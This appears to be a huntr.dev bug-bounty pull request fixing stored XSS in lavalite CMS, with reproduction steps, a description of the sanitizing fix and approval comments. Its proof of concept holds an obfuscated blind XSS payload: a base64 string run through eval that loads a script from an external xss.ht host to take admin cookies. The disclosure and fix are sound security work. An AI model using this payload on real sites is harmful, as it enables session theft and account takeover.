Fix XSS

[alromh87]

📊 Metadata *

Bounty URL: https://www.huntr.dev/bounties/3-packagist-lavalite%2Fcms

⚙️ Description *

Admin cookies and other details leading to an account take over to a higher level privilege from a client account of lavalite CMS and other multiple XSS in different pages due to acceptance of unsanitised data.

💻 Technical Description *

Fixed by implementing sanitizing middleware

🐛 Proof of Concept (PoC) *

1. Login to client account and admin account from entirely different browsers or through a private mode.
2. In the client account click on settings and update the address column with the blind payload and save the updates made.

"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYmVlZmVlLnhzcy5odCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs&#61; onerror=eval(atob(this.id))>

3. From the admin account move to the end point http://localhost/admin/user/client .
4. Booyah!!! XSS triggered.

🔥 Proof of Fix (PoF) *

After fix all input will be sanitized prior to being inserted and html components will be stripped from input

👍 User Acceptance Testing (UAT)

Application works normally

[Mik317]

LGTM 😄 🍰
I loved this fix - clear and simple ❤️

Maybe the fix will break the HTML code view in page creation, but it's 99% OK by my side 👍

Cheers,
Mik

[huntr-helper]

Congratulations alromh87 - your fix has been selected! 🎉

Thanks for being part of the community & helping secure the world's open source code.
If you have any questions, please respond in the comments section, or hit us up on Discord. Your bounty is on its way - keep hunting!

Come join us on Discord